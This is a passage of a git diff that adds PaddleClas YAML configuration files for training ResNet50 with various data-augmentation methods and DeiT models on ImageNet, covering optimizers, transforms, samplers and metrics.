sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 
5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml new file mode 100644 index 0000000..a00968a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + 
order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml new file mode 100644 index 0000000..603dfec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + 
flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml new file mode 100644 index 0000000..918a762 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# 
model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - CutmixOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml new file mode 100644 index 0000000..5a60a76 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - Cutout: + n_holes: 1 + length: 112 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' 
+ sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml new file mode 100644 index 0000000..ed180b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - 
NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - GridMask: + d1: 96 + d2: 224 + rotate: 1 + ratio: 0.5 + mode: 0 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml new file mode 100644 index 0000000..107738f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + 
image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - HideAndSeek: + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - 
TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml new file mode 100644 index 0000000..b125671 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 
0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml new file mode 100644 index 0000000..b0b6bfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - 
RandFlipImage: + flip_code: 1 + - RandAugment: + num_layers: 2 + magnitude: 5 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml new file mode 100644 index 0000000..216caa3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode 
and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: 
ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml new file mode 100644 index 0000000..fb3b9cc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + 
attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml new file mode 100644 index 0000000..d30b5f7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: 
False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_distilled_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 